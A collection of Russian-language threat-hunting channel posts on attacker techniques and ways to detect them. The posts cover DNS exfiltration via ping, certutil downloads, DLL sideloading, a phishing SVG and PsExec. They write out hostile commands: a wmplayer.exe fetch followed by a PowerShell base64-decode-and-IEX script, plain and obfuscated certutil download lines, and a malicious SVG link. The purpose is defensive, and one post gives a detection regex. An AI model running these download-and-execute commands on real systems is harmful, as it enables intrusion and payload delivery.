Собрал несколько статей, раскрывающих использование Python в наступательных операциях 🧑‍💻

🔤 https://trustedsec.com/blog/operating-inside-the-interpreted-offensive-python?utm_source=tg&utm_medium=hacker&utm_campaign=270125

🔤 https://thehackernews.com/2025/01/python-based-malware-powers-ransomhub.html

🔤 https://habr.com/ru/companies/slurm/articles/746622/

🔤 https://habr.com/ru/companies/numdes/articles/581374/

🔤 https://pythonassets.com/posts/create-executable-file-with-pyinstaller-cx_freeze-py2exe/

🔤 https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/

🔤 https://xakep.ru/2022/10/27/python-pyramid/

🔤 https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html

#ttp@detectioneasy

Всем привет!) 👋

В рядах living on the yet another пополнение, lottunnels

Проект агрегирует утилиты для построения туннелей из изолированных и защищенных сетей 🧑‍💻

#ttp@detectioneasy

Кайф, что проект не только собирает утилиты RMM, но и подготовил жирный набор Sigma-правил 🔭

#detection@detectioneasy

Ранее обсуждали использование вредоносами 🦠 Tor и утилит для туннелирования, на Хабре рассказали про альтернативные оверлейные сети, их нужно обнаруживать и блокировать)

#ttp@detectioneasy

У Unit 42 был замечательный отчет 😎 Начало обещает что-то интересное

This activity cluster used rare tools and techniques including the technique we call Hex Staging, in which the attackers deliver payloads in chunks. Their activity also includes exfiltration over DNS using ping, and abusing the SQLcmdutility for data theft.

🔤 эксфильтрация вывода команд через утилиту ping. Домен, который пингуют формируется так, tasklist.exe.outputformatstring.dnslog.pw , на месте tasklist.exe может быть другое имя. Каждый новый домен будет резолвится на dns-серверах, которые под контролем злоумышленников dnslog.pw (не забудьте сделать ретро по свои логам)

🔤 использование invoke-webrequest и certutil

🔤 DLL sideloading, для обхода обнаружения дропается уязвимый легитимный Acrobat.exe и рядышком незаметная Acrobat.DLL которая расшифрует и запустит PlugX

🔤 Hex Staging, суть метода запись файла по кускам в hex, а не полностью, для обхода обнаружения. Далее кодировка меняется с помощью certutil

🔤 для обхода UAC использовали SspiUacBypass (почитать), BadPotato, RasmanPotato

🔤 в качестве C2, кроме Cobalt Strike, группировка использовала Supershell

#ttp@detectioneasy

Всем привет!) ⚠️

Отличные новости 😅 в инструментах SysInternals обнаружили уязвимости DLL Hijacking

Некоторые из уязвимых утилит Sysmon, Process Explorer, Autoruns, Bginfo и другие 🧑‍💻

Полный список 🤔

#ttp@detectioneasy

У MITRE есть фреймфорк ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) - это база знаний о тактиках, техниках и процедурах атакующих в отношении систем Al, основанная на реальных наблюдениях за атаками и реалистичными демонстрациями.

Матрица имеет следующие тактики:

🔤 Reconnaissance
🔤 Resource Development
🔤 Initial Access
🔤 ML Model Access
🔤 Execution
🔤 Persistence
🔤 Privilege Escalation
🔤 Defense Evasion
🔤 Credential Access
🔤 Discovery
🔤 Collection
🔤 ML Attack Staging
🔤 Exfiltration
🔤 Impact

#ttp@detectioneasy

Всем привет! 👋

Исчерпывающие руководство по способам закрепления в Linux, но отсутствуют актуальные техники, такие как udev

#ttp@detectioneasy

Знали ли Вы о применении svg в фишинговых кампаниях 🧑‍💻?)

Sophos поделились накопленной информацией о применении такой техники.
Пример вредоносного файла с MalwareBazaar 🦠 который предлагает кликнуть для продолжения авторизации

<svg height="30" width="200" xmlns="http://www.w3.org/2000/svg">
  <a href="https://subtettiarrydivisions.s3.us-west-2.amazonaws.com/dzfhoerszgfiuwkeadbfwuoeudjiwsl.html" target="_blank">
    <text x="5" y="15" fill="blue">Yzesati Click To Sign </text>
  </a>
</svg>

Использование html-тегов выглядит безобидно всравнении с возможностями внедрения JS, который используется для автоматического перехода на вредоносный ресурс, даже если пользователь не нажал на ссылку.

Злоумышленники позаботились о защите своих ресурсов от песочниц и прикрутили к ним CAPTCHA от CloudFlare)
Нужно ли добавлять в ТЗ к песочницам возможность решения капчи для анализа ссылок??🧐)

#ttp@detectioneasy

Всем привет 👋

В отчете про Kimsuky 🧑‍💻 интересно, что при отсутствии на взломанном хосте службы удаленных рабочих столов, атакующие используют rdpwrap

Что же делать?)) 🔭

🔤 Создание файла RDPWInst.exe, rdpwrap.ini, rdpwrap.txt, rdpwrap.dll

🔤 метаданные файла совпадают с Product: RDP Host Support или Company: Stas'M Corp.

🔤 изменение ключа реестра HKLM\System\CurrentControlSet\services\TermService\Parameters\ServiceDll\

Можем похантить, если значение этого ключа не System32\termsrv.dll, стоит подзадуматься

#ttp@detectioneasy

Большой обзор про использование cloudflared для туннелирования трафика 🧑‍💻

https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/

#ttp&@detectioneasy

Как всегда супер отчет от thedfirreport

Почему-то все еще работают закрепы в автозагрузке и планировщике задач 🧑‍💻

#ttp@detectioneasy
#detection@detectioneasy

🔤🔤 Компания World of detection выбирает SIEM, и наткнулась на руководство от Elastic по выбору SIEM для современного SOC 🧃

Как и во всех документах по построению SOC сердцем являются - люди ✌️ но их эффективность зависит от применяемых решений

Какие функции должны быть у современного SIEM:
🔤 поддержка источников событий, применямых в Detection of the world
🔤 применение различных аналитических моделей (машинное обучение, поведенческий, статистический анализ)
🔤 автоматизация процессов триажа событий и проведения расследования
🔤 горизонтальное масштабирование производительности

В документе собрали чеклист из 25 пунктов по внедрению SIEM, в нем рассмотрены такие направления, как:
🔤 получение данных и их нормализация
🔤 обнаружение и предотвращение угроз
🔤 реагирование, проведение расследований и проактивный поиск угроз
🔤 архитектурные возможности

#detection@detectioneasy

Привет!) 👋

Все слышали про PsExec и многие с ним работали)
Он позволяет нам локально повысить привелегии до SYSTEM 😇 или другого пользователя, выполнять команды удаленно. Администраторы держат его под рукой, чтобы в случае нештатной ситуации быстро настроить сломавшийся хост)

Выглядит удобно, еще и подписан сертификатом Microsoft.

Получается идеальный инструмент для Lateral Movement 🧑‍💻 Хакеры и пентестеры часто используют PsExec или его аналоги psexec.py для продвижения по сети.

Что для красных удобно - для синих шумно 🤔

Уже не первый разбор в котором описана работа PsExec.

Вспомним основные этапы его работы:
🔤 загрузка двоичного файла в ADMIN$
🔤 удаленное создание службы
🔤 удаленный запуск службы
🔤 проверка, что служба запущена

В статье упоминали про утилиту psexecsvc.py. Основное отличие от других реализаций - использование подписанного файла для службы PsExecSvc, что может позволить обойти сигнатурное обнаружение

#ttp@detectioneasy
#detection@detectioneasy

Всем привет!) 👋
Пытались ли Вы скачать нагрузку с помощью certutil? Наверняка AV/EDR заблокировал Вашу попытку 🤚

Однако, если обфусцировать аргументы команд, попытка может стать успешной 👍

Для cmd/bat появился онлайн-ресурс https://argfuscator.net/, который обфусцирует аргументы. Правила обфускации определены в репозитории проекта

Интересно, сможем ли мы обнаружить, что запускалось на самом деле?)🔭

#ttp@detectioneasy

Специалисты ЛК поделились обзором по применению Mythic C2

Все как обычно, атакующие присылают письмо с архивом ✉️ внутри которого архив, внутри которого LNK, ps1 и много decoy-файлов) Да-да вот такие матрешки собираются 🪆

Дальше происходит выполнение ряда скриптов)

Интерес для TH может представлять использование conhost.exe в качестве родительского процесса

conhost --headless C:\Users\Public\Libraries\Passport\19.jpg

Можно познакомиться с Sigma-правилом

#ttp@detectioneasy
#detection@detectioneasy

Всем привет!)
В конце 2024 года, один из исследователей обнаружил возможность загружать файлы на хост с помощью Windows Medial Player - wmplayer.exe

Для запуска нужно выполнить

& "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "https://pampuna.nl/example/whoami.wma"

файл сохраняется в INetCache, для его поиска и запуска скрипт от автора ниже)

Get-ChildItem -Recurse -Force -ErrorAction SilentlyContinue -filter "whoami*.dat" "~\AppData\Local" | ForEach-Object {
    Write-Host "Found: $($_.FullName)"
    cd $_.DirectoryName 
    $data = [System.IO.File]::ReadAllBytes($_.FullName)
    $base64 = ([System.Text.Encoding]::UTF8.GetString($data) -replace '\b\w{1,5}\b', '') -replace '[^A-Za-z0-9+/=]', ''
    Write-Host $base64
    $converted = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64))
    IEX($converted)
}

Попробуем обнаружить?) 🔭

#ttp@detectioneasy
#detection@detectioneasy

Продолжим тему с обфускацией аргументов и команд в Windows

Есть два примера из событий запуска процессов, первый не обфусцированный:

certutil.exe -urlcache -split -f https://www.example.org/file.exe file.exe

и второй обфусцированный:

CeRtutIL.EXe -uʳLᶜᵃ?ᶜH?E? /ˢᵖˡ??It??ԫ -"F" htt"ps:/"/www.e"xa"m"p"le.o"r"g"/fi"le.e"xe" fi"L"E.exe

Если мы второй пример приведем к lowercase, то это нам особо не поможет, т.к. мы можем зафиксировать только факт использования бинаря)

Но кто в здоровой инфраструктуре будет использовать, такое количество непонятных символов, вставлять кавычки по середине слов? 🧑‍💻

Мы можем построить обнаружение на проверке регулярным выражением использования кавычек:

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 1 and CommandLine = "[\w\d\/\:]+\"+[\w\d\/\:]+"

В нормальной ситуации кавычки используются в начале и конце строки, наример certutil "https://qwer.qwer", а при обфускации кавычки вставляются в аргументы и их значения, для деления слова на неосмысленные группы

#ttp@detectioneasy
#detection@detectioneasy